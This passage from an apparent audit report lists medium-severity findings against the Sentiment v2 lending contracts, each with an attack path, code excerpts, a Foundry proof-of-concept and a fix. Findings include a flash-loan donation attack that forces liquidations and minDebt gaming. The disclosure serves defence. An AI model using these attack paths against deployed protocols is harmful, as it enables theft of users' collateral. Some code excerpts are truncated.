+       Position(payable(position)).repay(poolId, repayAmount);

+       // handle remaining debt if any
+       if (repayAmount < positionDebt) {
+           // logic to handle remaining debt, e.g., updating records, notifying stakeholders, etc.
+       }

Issue M-19: Rounding Errors will Prevent Full Debt Repayment for Users


The protocol has acknowledged this issue.

Found by



Rounding down in the repay function will cause an inability to fully repay debt for users as the function will leave a small amount of debt due to rounding down borrow shares.

Root Cause

In protocol-v2/src/Pool.sol::repay the function rounds down the borrow shares to burn, which can leave a small amount of debt.

Internal pre-conditions

  1. User needs to have an outstanding debt in the pool.
  2. User needs to call the repay function with an amount intended to fully repay the debt.

External pre-conditions


Attack Path

  1. User calls getBorrowsOf to determine the total debt.
  2. User calls repay with the amount returned by getBorrowsOf.
  3. The repay function rounds down the borrow shares to burn, leaving a small amount of debt.
  4. User is unable to fully repay the debt due to the remaining borrow shares.


The users cannot fully repay their debt, which can cause issues with the minimum debt requirement and prevent the removal of the debt pool from the user's debtPools array.


  1. User has a debt of 100.5 units in the pool.
  2. User calls getBorrowsOf and gets a debt amount of 100.5 units.
  3. User calls repay with 100.5 units.
  4. The repay function rounds down the borrow shares, leaving 0.5 units of debt.
  5. User is unable to fully repay the debt, causing issues with the minimum debt requirement.


To fix the issue, the repay function should round up the borrow shares to burn when the user is repaying the entire debt.

Code Fix:

function repay(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {
    PoolData storage pool = poolDataFor[poolId];

    // ... existing code ...

    // compute borrow shares equivalent to notional asset amt
-   uint256 borrowShares = _convertToShares(amt, pool.totalBorrowAssets, pool.totalBorrowShares, Math.Rounding.Down);
+   uint256 borrowShares = _convertToShares(amt, pool.totalBorrowAssets, pool.totalBorrowShares, Math.Rounding.Up);

    // ... existing code ...

This change ensures that the repay function rounds up the borrow shares to burn, preventing the issue of leaving a small amount of debt due to rounding down. This will allow users to fully repay their debt without leaving any residual borrow shares.

Issue M-20: All borrowed assest are deducted instead of LOSS leading to Improper Loss Calculation in Bad Debt Liquidation Leading to Significant User Losses


The protocol has acknowledged this issue.

Found by

A2-security, Bigsam, X12


The implementation of the rebalanceBadDebt function fails to correctly handle bad debt liquidation, leading to an inequitable distribution of losses among lenders. Instead of socializing the loss proportionally among all lenders, the function deducts the entire amount of borrowed shares from the pool, potentially causing a significant loss for users withdrawing from the Pool while SuperPool loses funds as more shares are burnt to receive less assets. This can result in a user losing 20% or more of the tokens they should receive. Docs-

### Bad Debt Positions

Bad debt positions positions include positions that owe more debt to the protocol than the total value of assets in the position. The purpose of liquidating a bad debt position is to ensure the Base Pool is not rendered unusable due to accumulation of bad debt. Accordingly, these positions can only be liquidated by the protocol governance.

The process of liquidating a bad debt position involves socializing the bad debt across all lenders of the Base Pool proportional to their share of deposits. The protocol clears the debt owed by the bad debt position and the loss is realized equitably among all lenders.

Vulnerability Detail

According to the protocol documentation, when liquidating a bad debt position, the loss should be socialized across all lenders in the Base Pool proportionally to their share of deposits. This ensures that no single user bears the entire loss and the Base Pool remains usable.

However, the current implementation of the rebalanceBadDebt function does not adhere to this principle. Instead, it deducts the entire amount of asset borrowed from the pool without considering the actual loss incurred. This behavior leads to a situation where a user who withdraws from the SuperPool immediately this function is called will receive significantly fewer tokens than they are entitled to and more of their shares will burnt, as the total deposit amount is reduced by the borrowed amount rather than the actual loss.

function rebalanceBadDebt(uint256 poolId, address position) external {
    PoolData storage pool = poolDataFor[poolId];
    accrue(pool, poolId);

    // revert if the caller is not the position manager
    if (msg.sender != positionManager) revert Pool_OnlyPositionManager(poolId, msg.sender);

    // compute pool and position debt in shares and assets
    uint256 totalBorrowShares = pool.totalBorrowShares;
    uint256 totalBorrowAssets = pool.totalBorrowAssets;
    uint256 borrowShares = borrowSharesOf[poolId][position];
    // [ROUND] round up against lenders
    uint256 borrowAssets = _convertToAssets(borrowShares, totalBorrowAssets, totalBorrowShares, Math.Rounding.Up);

    // rebalance bad debt across lenders
    pool.totalBorrowShares = totalBorrowShares - borrowShares;
    // handle borrowAssets being rounded up to be greater than totalBorrowAssets
    pool.totalBorrowAssets = (totalBorrowAssets > borrowAssets) ? totalBorrowAssets - borrowAssets : 0;
    uint256 totalDepositAssets = pool.totalDepositAssets;

@audit>> we are reducing by totalborrowasset not LOSS>>   pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;
    borrowSharesOf[poolId][position] = 0;


This issue can lead to significant financial losses for users withdrawing from the SuperPool. As the total deposit assets are incorrectly reduced, users may lose a large portion of their tokens.

Steps to Reproduce

  1. A user deposits assets into the SuperPool.
  2. Another user borrows a significant amount from the Base Pool.
  3. The borrowed amount is not repaid, leading to a bad debt situation.
  4. The rebalanceBadDebt function is called to liquidate the bad debt.
  5. The function reduces the total deposit assets by the entire borrowed amount instead of the actual loss incurred.
  6. The first user attempts to withdraw their assets from the SuperPool and receives significantly less than expected due to the incorrect deduction.
// instead of reducing the total deposit by the loss we deduct the whole amount borrowed
    function testDepositBorrowLiquidateandWithdrawAssets() public { //uint96 assets
        uint96 assets1 = 200e18;

// initiall shares of user 200e18
        assertEq(pool.getAssetsOf(linearRatePool, user),200e18);

     // another user borrows 10e18 and his borrow ebters baddebt, loss of about 74% of the position. the debt was cleared but when user withdraws 100e18 all his shares is burnt because all the borrowed amount was deducted.   
        asset2.approve(address(positionManager), 100e18);
        asset3.approve(address(positionManager), 50e18);

        // deposit 1e18 asset2, borrow 1e18 asset1
        Action[] memory actions = new Action[](6);
        (position, actions[0]) = newPosition(user, bytes32(uint256(0x123456789)));
        actions[1] = deposit(address(asset2), 100e18);
        actions[2] = deposit(address(asset3), 50e18);

        actions[3] = addToken(address(asset2));
        actions[4] = addToken(address(asset3));
        actions[5] = borrow(linearRatePool, 100e18);
        // actions[4] = approve(address(mockswap), address(asset1), 1e18);
        // bytes memory data = abi.encodeWithSelector(SWAP_FUNC_SELECTOR, address(asset1), address(asset3), 1e18);
        // actions[5] = exec(address(mockswap), 0, data);
        // actions[6] = addToken(address(asset3));
        positionManager.processBatch(position, actions);

        // (uint256 totalAssetValue, uint256 totalDebtValue, uint256 minReqAssetValue) = riskEngine.getRiskData(position);

        // assertEq(totalAssetValue, 150e18);
        // assertEq(totalDebtValue, 100e18);
        // assertEq(minReqAssetValue, 111.1111111111111110001e18);

        // construct liquidator data
        DebtData memory debtData = DebtData({ poolId: linearRatePool, amt: type(uint256).max });
        DebtData[] memory debts = new DebtData[](1);
        debts[0] = debtData;
        AssetData memory asset1Data = AssetData({ asset: address(asset3), amt: 50e18 });
        AssetData memory asset2Data = AssetData({ asset: address(asset2), amt: 100e18 });
        AssetData[] memory assets = new AssetData[](2);
        assets[0] = asset1Data;
        assets[1] = asset2Data;

        // modify asset2 price from 1eth to 0.1eth
        FixedPriceOracle pointOneEthOracle = new FixedPriceOracle(1e16);
        riskEngine.setOracle(address(asset2), address(pointOneEthOracle));

         // modify asset2 price from 1eth to 0.1eth
        FixedPriceOracle pointtwoEthOracle = new FixedPriceOracle(5e17);
        riskEngine.setOracle(address(asset3), address(pointtwoEthOracle));

        (uint256 totalAssetValue2, uint256 totalDebtValue2, uint256 minReqAssetValue2) = riskEngine.getRiskData(position);

        assertEq(totalAssetValue2, 26e18);
        assertEq(totalDebtValue2, 100e18);
        assertEq(minReqAssetValue2, 111.111111111111111001e18);

        // liquidate
        asset1.approve(address(positionManager), 100e18);

        pool.withdraw(linearRatePool, 100e18, user, user);

        assertEq(pool.getAssetsOf(linearRatePool, user), 0);
        assertEq(pool.balanceOf(user, linearRatePool), 0);

        assertEq(asset1.balanceOf(user), 100000000000000000000);

// even if admins tries to swap and redeposit this token back there is a big risk here 
// 1. contract can be paused  
// 2. the deposit inflates the deposited shares and the loss to the user remains the same


Code Snippet

Tool used

Manual Review


Even if Admin batches a call to clear bad debt and swap the asset gotten and redeposit into the pool we should note that pools can be paused to prevent deposits but withdrawals, and bad debt clearing can't be stopped. hence it is safe to account for this appropriately and transfer the swapped funds back to the pool.

To correctly socialize the loss among all lenders, modify the rebalanceBadDebt function to calculate the actual loss and distribute it proportionally among all lenders.

Proposed Solution

  1. Calculate the loss in ETH: loss = ETH value of borrowed asset - ETH value of total deposit.
  2. Determine the loss per lender by dividing the loss by the total borrowed asset in ETH.
  3. Multiply the result by the total borrowed asset in token decimals to get the actual loss to be subtracted.
  4. Update the rebalanceBadDebt function to include a new variable for the loss and adjust the total deposit assets accordingly.

Here’s a conceptual example of the modification:

uint256 loss = (totalBorrowAssetsInETH - totalDepositAssetsInETH);
uint256 lossInToken = (loss * totalBorrowAssetsInTokenDecimals) / totalBorrowAssetsInETH;

This change will ensure that the loss is equitably realized among all lenders, preventing a significant and unfair loss to any single user.

Issue M-21: Small loans can extend the TVL of any position up to 90%


Found by



Users can exploit the minDebt feature to extend their LTV up to 90% for risky assets.

Vulnerability Detail

The system uses a minDebt threshold to ensure that positions are profitable for liquidation. Loans below this amount may not be profitable to liquidate, as liquidators would incur gas fees, increasing their costs.

The repay function checks if the borrowed amount is below minDebt and reverts the TX if it is.

        remainingShares = borrowSharesOf[poolId][position] - borrowShares;
        if (remainingShares > 0) {
            uint256 newBorrowAssets = _convertToAssets(
                remainingShares, pool.totalBorrowAssets - amt, pool.totalBorrowShares - borrowShares, Math.Rounding.Down
            if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
                revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);

Liquidators also cannot seize the entire position. They are limited to a maximum of debt repaid * 1e18 / 0.9e18, which is 11% more than what they have to repay. That's their profit.

        uint256 maxSeizedAssetValue = debtRepaidValue.mulDiv(1e18, (1e18 - discount));
        if (assetSeizedValue > maxSeizedAssetValue) {
            revert RiskModule_SeizedTooMuch(assetSeizedValue, maxSeizedAssetValue);

Users combine the above 2 mechanics and game the system by taking small loans that prevent liquidators from fully liquidating their position due to the minDebt limit, while also making partial liquidation unprofitable.


  1. A WETH pool has risky collateral - token X with an LTV of 50%.
  2. Alice opens a position with collateral X valued at 0.05 ETH (equal to minDebt).
  3. She borrows 0.25 WETH from the pool.
  4. The asset’s price drops, increasing her LTV to 55%.

Alice won’t be liquidated because any liquidation attempt would leave her position below minDebt, causing the transaction to revert. Liquidators must wait until her LTV reaches 90% to perform a full liquidation (~0.045 debt, for 0.05 col).

Alice can also avoid paying her debt, as the risky asset might very well quickly cross the gap between 90% and 100% and make her position insolvent, causing bad debt. She can abuse this on chains with low fees (ARB, BASE, OP) and create multiple position borrowing from the pool.


The core LTV mechanism is broken. Users can leverage risky assets with high LTV, increasing the system’s exposure to bad debt.

Code Snippet

        uint256 maxSeizedAssetValue = debtRepaidValue.mulDiv(1e18, (1e18 - discount));
        if (assetSeizedValue > maxSeizedAssetValue) {
            revert RiskModule_SeizedTooMuch(assetSeizedValue, maxSeizedAssetValue);

Tool Used

Manual Review


Allow liquidators to fully liquidate a position if the remaining value is less than minDebt.

Issue M-22: SuperPool is ERC-4626 compliant, but the maxWithdraw & maxRedeem functions are not fully up to EIP-4626's specification


Found by

000000, Atharv, Flare, h2134, pseudoArtist


The maxWithdraw & maxRedeem functions should return the 0 when the withdrawal is paused, but in this case it is not returning 0.

Vulnerability Detail

SuperPool can be paused, since it is pausable contract and also there is a function togglePause() , also in the readMe it is specifically written that superPool is supposed to be strictly ERC4626 compliant, i.e any issue arising from non compliance should be taken into account and will be a valid issue in this case.

According to EIP-4626 specifications:


MUST factor in both global and user-specific limits, like if withdrawals are entirely disabled (even temporarily) it MUST
 return 0.


MUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST
 return 0.

But it is not enforced in our case and the maxWithdraw and maxRedeem functions are not having any logic to return 0 when to whole contract is paused and withdraw and redeem is disabled in that case.


Code Snippet

Tool used

Manual Review


Include a logic for returning 0 when the contract is paused.

Issue M-23: None of the functions in SuperPool checks pause state


Found by

000000, 0xAristos, 0xDemon, 0xLeveler, 0xMax1mus, 0xpranav, 4gontuk, A2-security, Atharv, Bigsam, EgisSecurity, Flare, HHK, Kalogerone, Mahi_Vasisth, Mike_Bello90, MohammedRizwan, Obsidian, Ryonen, ZeroTrust, aslanbek, cryptomoon, dimah7, h2134, oxkmmm, pseudoArtist, theweb3mechanic, wellbyt3


None of the functions in SuperPool checks pause state.

Vulnerability Detail

SuperPool contract is Pausable. SuperPool.sol#L25:

contract SuperPool is Ownable, Pausable, ReentrancyGuard, ERC20 {

togglePause() is implemented to toggle pause state of the SuperPool. SuperPool.sol#L163-L167:

    /// @notice Toggle pause state of the SuperPool
    function togglePause() external onlyOwner {
        if (Pausable.paused()) Pausable._unpause();
        else Pausable._pause();

However, none of the functions in SuperPool checks the pause state, renders the pause functionality meaningless. As confirmed with sponsor, pause state checking should be implemented on some functions.


None of the functions in SuperPool can be paused.

Code Snippet

Tool used

Manual Review


It is recommend to implemented pause state checking on some of the functions, for example, and deposit() and mint() functions: SuperPool.sol#L258:

-    function deposit(uint256 assets, address receiver) public nonReentrant returns (uint256 shares) {
+    function deposit(uint256 assets, address receiver) public whenNotPaused nonReentrant returns (uint256 shares) {


-    function mint(uint256 shares, address receiver) public nonReentrant returns (uint256 assets) {
+    function mint(uint256 shares, address receiver) public whenNotPaused nonReentrant returns (uint256 assets) {

Issue M-24: Exploiter can force user into unhealthy condition and liquidate him


Found by



Protocol implements a flexible cross-margin portfolio managment with the help of Position smart contract, which should hold borrower's collateral and debt positions. Anyone can open a pool in the singleton Pool contract and chose valid collateral assets with corresponding LTV values by calling RiskEngine#requestLtvUpdate -> acceptLtvUpdate. In the README it is stated that the bound for valid LTVs would be in the range 10%-98% There is a flaw in the way risk module calculates whether a position is healthy.

Root Cause

The problem roots is that _getPositionAssetData uses getAssetValue, which uses IERC20(asset).balanceOf(position) to obtain the tokens for the given asset in user's position:

    function getAssetValue(address position, address asset) public view returns (uint256) {
        IOracle oracle = IOracle(riskEngine.getOracleFor(asset));
        uint256 amt = IERC20(asset).balanceOf(position);
        return oracle.getValueInEth(asset, amt);

Later, when we calculate the minRequired collateral for given debt, we use a wighted average tvl based on the weights in the user position:

                // debt is weighted in proportion to value of position assets. if your position
                // consists of 60% A and 40% B, then 60% of the debt is assigned to be backed by A
                // and 40% by B. this is iteratively computed for each pool the position borrows from
                minReqAssetValue += debtValuleForPool[i].mulDiv(wt[j], ltv, Math.Rounding.Up)

The problem is that expoiter may donate funds to user position with the collateral asset with the lowest LTV, which will manipulate _getMinReqAssetValue calculation and may force the user into liquidation, where the expoiter will collect the donated funds + user collateral + discount.

Internal pre-conditions

  1. Borrower should have an asset portfolio with one asset with low LTV and other with large LTV.
  2. Borrower should have most of his portfolio value in the asset with higher LTV
  3. Borrower should have an active loan and be close to liquidation, but still healthy

External pre-conditions

Nothing special

Attack Path

Imagine the following scenario: We use $ based calculations for simplicity, but this does not matter for the exploit. We also have simplified calculations to simple decimals (100% = 100) to remove unnececarry for this case complexity.

Precondition state: Victim Position Asset Porfolio: [USDC = $1000; WBTC = $10] Pool 1: [Leding Asset = DAI] [USDC tvl = 95%; WBTC tvl = 30%]

  1. Victim borrows $940 DAI from pool 1 against his portfolio from above (minReqAssetValue = (940 * 99 / 95) + (940 * 1 / 30) = 979 + 31 ~= $1 010)
  2. User position is healthy and collateral value is exactly the minReqAssetValue Attack beggins:
  3. Attacker take a flashloan of $990 WBTC and transfer it to the victim's position (WBTC has 30% ltv for this debt pool)
  4. When he calls liquidate, we enter validateLiquidation -> isPositionHealthy, where we get each asset value and weight:
    • We have totalAssetValue = $2000 positinAssets = [USDC; WBTC] , positionAssetWeight = [50; 50]
    • We pass those params to _getMinReqAssetValue and we iterate two times for the single $940 debt and here is the result
      • 1st iteration (USDC): minReqAssetValue += 940 * 50 / 95 = 494
      • 2nd iteration (WBTC) minReqAssetValue += 940 * 50 / 30 = 1 566
    • Result ~= 494 + 1 566 = $2 060 , which is $60 > totalAssetValue, which means that position is not healthy.
  5. Liquidator has provided to repay all 940 against all collateral + the donated WBTC = $1000 USDC + $1000
  6. His transaction passes and he has made profit, he rapays the flash loan


Introduce virtual balance inside position, which is updated on deposit/withdraw actions. This will prevent manipulations of the weighted average tvl due to donations.


Unfair liquidations, which in normal situations may never occur, result in the theft of user collateral.


No response


Introduce virtual balance inside position, which is updated on deposit/withdraw actions. This will prevent manipulations of the weighted average tvl due to donations.

Issue M-25: In liquidateBadDebt, transferring all the assets from the position to the protocol’s owner is unfair to the lender, as it increases the lender’s losses.


The protocol has acknowledged this issue.

Found by

4rdiii, AlexCzm, Hearmen, Honour, KupiaSec, Mykola-ops, S3v3ru5, ZeroTrust, dhank, h2134, jennifer37


In liquidateBadDebt, all the assets from the position are transferred to the protocol’s owner, while the lender bears the full loss of the entire borrowed amount, not just the under-collateralized portion (i.e., debtValue - assetValue). This results in an unfair outcome for the lender.

Vulnerability Detail

function liquidateBadDebt(address position) external onlyOwner {

        // transfer any remaining position assets to the PositionManager owner
        address[] memory positionAssets = Position(payable(position)).getPositionAssets();
        uint256 positionAssetsLength = positionAssets.length;
        for (uint256 i; i < positionAssetsLength; ++i) {
            uint256 amt = IERC20(positionAssets[i]).balanceOf(position);
@>>            try Position(payable(position)).transfer(owner(), positionAssets[i], amt) { } catch { }

        // clear all debt associated with the given position
        uint256[] memory debtPools = Position(payable(position)).getDebtPools();
        uint256 debtPoolsLength = debtPools.length;
        for (uint256 i; i < debtPoolsLength; ++i) {
@>>            pool.rebalanceBadDebt(debtPools[i], position);
@>>            Position(payable(position)).repay(debtPools[i], type(uint256).max);

We can see in the liquidateBadDebt function that all of the position’s assets are transferred to the owner, but none of the debt is actually repaid.

  function rebalanceBadDebt(uint256 poolId, address position) external {
        PoolData storage pool = poolDataFor[poolId];
        accrue(pool, poolId);

        // revert if the caller is not the position manager
        if (msg.sender != positionManager) revert Pool_OnlyPositionManager(poolId, msg.sender);

        // compute pool and position debt in shares and assets
        uint256 totalBorrowShares = pool.totalBorrowShares;
        uint256 totalBorrowAssets = pool.totalBorrowAssets;
        uint256 borrowShares = borrowSharesOf[poolId][position];
        // [ROUND] round up against lenders
        uint256 borrowAssets = _convertToAssets(borrowShares, totalBorrowAssets, totalBorrowShares, Math.Rounding.Up);

        // rebalance bad debt across lenders
@>>        pool.totalBorrowShares = totalBorrowShares - borrowShares;
        // handle borrowAssets being rounded up to be greater than totalBorrowAssets
@>>        pool.totalBorrowAssets = (totalBorrowAssets > borrowAssets) ? totalBorrowAssets - borrowAssets : 0;
        uint256 totalDepositAssets = pool.totalDepositAssets;
@>>        pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;
        borrowSharesOf[poolId][position] = 0;

In the rebalanceBadDebt function, the debt is only cleared at the accounting level, without transferring the actual funds needed to repay the debt. Directly reducing borrowAssets from totalDepositAssets forces all lenders to bear the loss of the borrowed funds.

 function repay(uint256 poolId, uint256) external onlyPositionManager {
        if (POOL.getBorrowsOf(poolId, address(this)) == 0) debtPools.remove(poolId);

We can see that in the position.repay() function, there is also no actual transfer of funds to repay the debt.


The lender bears the full loss of the borrowed funds, not just the under-collateralized portion (i.e., debtValue - assetValue), while the owner profits. This is extremely unfair to the lender.

Code Snippet

Tool used

Manual Review


The protocol should either repay all of the debt or sell the position’s collateral (assets) into the debt token to cover the outstanding debt.

Issue M-26: The liquidate() function requires that after liquidation, the position must be in a healthy state. This may result in certain positions never being liquidated if they cannot reach a healthy state, potentially leaving them in limbo.


Found by



Since the position’s funds are discounted during liquidation, this could further deteriorate the position’s health instead of restoring it. As a result, the lender’s funds could be exposed to even greater risk, rather than mitigating the situation as intended.

Vulnerability Detail

    function liquidate(
        address position,
        DebtData[] calldata debtData,
        AssetData[] calldata assetData
    ) external nonReentrant {
        riskEngine.validateLiquidation(position, debtData, assetData);

        // liquidate
        _transferAssetsToLiquidator(position, assetData);
        _repayPositionDebt(position, debtData);

        // position should be within risk thresholds after liquidation
@>>        if (!riskEngine.isPositionHealthy(position)) revert PositionManager_HealthCheckFailed(position);
        emit Liquidation(position, msg.sender, ownerOf[position]);

We can see that the liquidate() function requires the position to be in a healthy state after liquidation. Although liquidators are given the opportunity to acquire collateral at a discounted price (e.g., 10%), because the position must be restored to a healthy state after liquidation, the liquidator’s profit in some cases may be very small or even nonexistent. This lack of incentive for the liquidator could result in certain positions remaining unliquidated, leading to further losses for the lender.

Proof of Concept (POC):

Let’s take an example scenario:

Assume an asset has an LTV of 98%, a price of 1, and a quantity of 100.

The borrow token quantity is 98, with a price of 1, and the borrowed amount is 98.

The loan value is 98, and the minimum collateral value is 100.

The position is currently in a healthy state.

When the price drops by 1.5%, i.e., the price becomes 0.985, the collateral value is 98.5, which is less than 100.

At this point, the position becomes eligible for liquidation.

The liquidator’s profit from liquidating the entire position would be 1. However, the discounted price is calculated as 1-98.5/99 = 0.5% , which results in a 0.5% discount—far below the expected 10%. This might not be sufficient to motivate the liquidator to liquidate the position.

As a result, if the price drops further, the liquidator’s profit decreases even more. In the volatile world of cryptocurrencies, a 20%-30% price drop is common during market crashes, which could lead to a large number of positions becoming unliquidatable.

If the liquidator liquidates a portion of the position at a discounted price (10%), it would actually make the position even more unhealthy, causing the transaction to revert.

For example, if the liquidator tries to liquidate 10 borrow tokens, they would need to acquire collateral equivalent to:

101/(0.985 (1-10%)) = 11.28

The remaining position would be:

•   Borrow tokens: 88
•   Required collateral: 89.7959
•   Remaining collateral: 88.71968
•   Value of remaining collateral: 87.3888

As we can see, the health of the position decreases further rather than restoring it to a healthy state. This worsens the situation and prevents the position from being brought back to a healthy state, leading to a revert.

Therefore, this creates a situation where the position becomes unliquidatable.


Some positions cannot be liquidated, resulting in losses for the lender.

Code Snippet

Tool used

Manual Review


The liquidation process should be allowed as long as it does not worsen the health of the position, even if it doesn’t fully restore the position to a healthy state. This would help minimize losses for the lender.

Issue M-27: Under certain circumstances bad debt will cause first depositor to lose funds


Found by



The protocol handles bad debt through PositionManager::liquidateBadDebt()

 function liquidateBadDebt(address position) external onlyOwner {

        // transfer any remaining position assets to the PositionManager owner
        address[] memory positionAssets = Position(payable(position)).getPositionAssets();
        uint256 positionAssetsLength = positionAssets.length;
        for (uint256 i; i < positionAssetsLength; ++i) {
            uint256 amt = IERC20(positionAssets[i]).balanceOf(position);
            try Position(payable(position)).transfer(owner(), positionAssets[i], amt) { } catch { }

        // clear all debt associated with the given position
        uint256[] memory debtPools = Position(payable(position)).getDebtPools();
        uint256 debtPoolsLength = debtPools.length;
        for (uint256 i; i < debtPoolsLength; ++i) {
            pool.rebalanceBadDebt(debtPools[i], position);
            Position(payable(position)).repay(debtPools[i], type(uint256).max);

The function is used to handle bad debt if it occurs for a specific position.

Let's examine pool.rebalanceBadDebt:

function rebalanceBadDebt(uint256 poolId, address position) external {
        PoolData storage pool = poolDataFor[poolId];
        accrue(pool, poolId);

        // revert if the caller is not the position manager
        if (msg.sender != positionManager) revert Pool_OnlyPositionManager(poolId, msg.sender);

        // compute pool and position debt in shares and assets
        uint256 totalBorrowShares = pool.totalBorrowShares;
        uint256 totalBorrowAssets = pool.totalBorrowAssets;
        uint256 borrowShares = borrowSharesOf[poolId][position];
        // [ROUND] round up against lenders
        uint256 borrowAssets = _convertToAssets(borrowShares, totalBorrowAssets, totalBorrowShares, Math.Rounding.Up);

        // rebalance bad debt across lenders
        pool.totalBorrowShares = totalBorrowShares - borrowShares;
        // handle borrowAssets being rounded up to be greater than totalBorrowAssets
        pool.totalBorrowAssets = (totalBorrowAssets > borrowAssets) ? totalBorrowAssets - borrowAssets : 0;
        uint256 totalDepositAssets = pool.totalDepositAssets;
        pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;
        borrowSharesOf[poolId][position] = 0;

Wen ca see that totalBorrowShares, totalBorrowAssets and totalDepositAssets decremented by their respective values (shares and assets).

When bad debt occurs and is liquidated, it's basically written off the protocol and the losses are socialized between all the depositors of that pool.

There is 1 problem with this, if a position has borrowed the entire assets of the pool and is liquidated due to bad debt. This is realistic if the pool is unpopular for some reason (niche token, high fees, etc...). Note that this can also occur when all positions incur bad debt and their debt gets socialized, but it's a rarer for this to happen.

The problem will be the fact that totalDepositAssets will equal 0. When it's 0, when a user deposits into the pool, his shares are minted 1:1 to the assets he is providing, which is a problem, because there are other shares in the pool at this time, the shares of the depositors that got socialized the bad debt.


  1. Alice deposits 100 tokens in the pool and she gets 100 shares, due to her being the first depositor the shares are minted 1:1.
  2. Bob borrows all 100 tokens. Now, totalDepositAssets == totalBorrowAssets.
  3. Time passes and 50 interest is accrued, now totalDepositAssets = 150 and totalBorrowAssets = 150.
  4. Bob is eligible to be liquidated, but he isn't. This can happen due to lack of incentive for liquidators, Bob's collateral plummets in price very quickly, Bob's loan goes up in price very quickly.
  5. Bob has now accumulated bad debt and the debt is liquidated through liquidateBadDebt.
  6. When rebalanceBadDebt is called both totalDepositAssets and totalBorrowAssets equal 0.
  7. At this point, totalDepositAssets = 0, but totalDepositShares = 100.
  8. Charlie deposits another 100 assets into the pool and his shares are minted 1:1 again, due to this:
    function _convertToShares(
        uint256 assets,
        uint256 totalAssets,
        uint256 totalShares,
        Math.Rounding rounding
    ) internal pure returns (uint256 shares) {
        if (totalAssets == 0) return assets;
        shares = assets.mulDiv(totalShares, totalAssets, rounding);
  9. Charlie receives 100 shares, but Alice also has 100 shares and there are only 100 assets in the pool, so Charlie actually received the penalties of the debt being socialized, even though he deposited after the liquidation of bad debt.

Root Cause

Allowing for 100% utilization of assets.

Note that only 1 of the 3 bellow have to happen in order for the issue to occur.

Internal pre-conditions


  1. The interest becomes to high.

External pre-conditions


  1. The price of the collateral drops
  2. The price of the debt goes up

Attack Path



Loss of funds




Don't allow for pools to reach 100% utilization.

Issue M-28: Pool::liquidate()


Found by



In lending/borrowing protocols, liquidations are done by liquidators who are users (or bots) that liquidate positions based of an incentive. For example repaying 100$ debt and receiving 110$ in return, so they turn a 10$ profit.

If there are no incentives to liquidate someone, then liquidators won't liquidate them, so it's very important to always have an incentive otherwise the protocol can incur bad debt.

In Sentiment there are several ways for liquidators to not have an incentive to liquidate an unhealthy position.

  1. Dust positions: A user can have a position with up to 5 dust loans. In this situation the gas that the liquidator has to pay (especially on mainnet) will outweigh the amount of collateral they will receive in return for repaying the loan.
  2. User gets his collateral blacklisted: If position has collateral which supports blacklisting like USDC/USDT, which are both supported by the protocol. If the position is blacklisted, then the collateral cannot be transferred, so the liquidator won't be able to receive it, thus tanking his incentive significantly.
  3. Liquidation fee: The protocol implements a liquidation fee, which is a % of the collateral that goes to the owner() when a position gets liquidated. When the fee is applied, there might not be enough tokens as an incentive for the liquidator, in extreme cases he might even lose money if he liquidates a position.
  4. Very high LTV assets: The protocol has provided these example values. We can see that WETH has 95% LTV. This means that the liquidator can get a max discount of 5%, trying to get the full 10% discount is impossible since there won't be enough tokens in the position. This combined with a smaller loan and higher gas costs diminish the incentive for liquidations.

Example of point 3: I'll be using $ values to simplify the example:

  1. Liquidation fee is 20%.
  2. Position has USDC as collateral with 90% LTV.
  3. The position has 100$ collateral and their debt is 92$ so they can be liquidated.
  4. The liquidator is expecting to pay 92$ of debt and retrieve 100$ worth of collateral, netting a 8$ profit.
  5. But because of the 20% liquidation fee, he will actually receive 80$ worth of collateral, since 20$ (20%) go to the owner as part of the liquidation fee. In this case he will actually lose 12$ for repaying the debt, which he obviously won't do.

Root Cause

There are several causes:

  1. Allowing minDebt and minBorrow to be 0 or a very small value. The README of the contest states:

    Min Debt = from 0 to 0.05 ETH = from 0 to 50000000000000000 Min Borrow = from 0 to 0.05 ETH

  2. Collateral with high LTV (~90% and up) and higher liquidation fee diminish the incentive for liquidations substantially and can even cause loses.

    Min LTV = 10% = 100000000000000000 Max LTV = 98% = 980000000000000000 Liquidation Fee = 0 (Might be increased to 20-30% in the future)

  3. Higher liquidation fees.

Internal pre-conditions

One or all of the following, they can all cause the lack of incentive:

  1. minDebt and minBorrow equal 0 or a very small number.
  2. High LTV assets.
  3. Liquidation fee combined with a relative LTV.

External pre-conditions


Attack Path



No incentive to liquidate positions, which can lead to bad debt and loss of funds for users in the long run.




Enforce a higher minDebt and minBorrow. Enforce a smaller or no liquidation fee. Decrease max allowed LTV.

Issue M-29: Liquidators may repay a position's debt to pools that are within their risk tolerance, breaking the concept of isolated risk in base pools


Found by

HHK, Nihavent


The trust model of the protocol is such that depositors to pools must trust the pool owners, however there was no documented trust assumption between base pool owners. Creating a base pool is permissionless so the owner of pool A shouldn't be able to do something that adversely affects pool B.

However, liquidations that affect Pool B can be caused by Pool A's risk settings despite the position being within Pool B's risk tolerance, which means base pools do not have isolated risk and there is a trust assumption between base pool owners.

According to the Sentiment Docs, one of the core concepts is isolated financial activities and risk:

"Each Base Pool operates independently, ensuring the isolation of financial activities and risk."

But with the current design, the LTVs set by a base pool impacts the likelihood of liquidations in every other base pool which shares a common position via loans.

Vulnerability Detail

A position with debt and recognized assets is determined to be healthy if the recognized collateral exceeds the minReqAssetValue:

    function isPositionHealthy(address position) public view returns (bool) {
        // a position can have four states:
        // 1. (zero debt, zero assets) -> healthy
        // 2. (zero debt, non-zero assets) -> healthy
        // 3. (non-zero debt, zero assets) -> unhealthy
        // 4. (non-zero assets, non-zero debt) -> determined by weighted ltv

        ... SKIP!...

@>      uint256 minReqAssetValue =
            _getMinReqAssetValue(debtPools, debtValueForPool, positionAssets, positionAssetWeight, position);
        return totalAssetValue >= minReqAssetValue; // (non-zero debt, non-zero assets)

_getMinReqAssetValue is the sum of required asset value across all collateral tokens and debt positions, adjusted for: the weight of each collateral token, magnitude of debt from a given pool, and the ltv setting for that asset set by that pool:

    function _getMinReqAssetValue(
        uint256[] memory debtPools,
        uint256[] memory debtValuleForPool,
        address[] memory positionAssets,
        uint256[] memory wt,
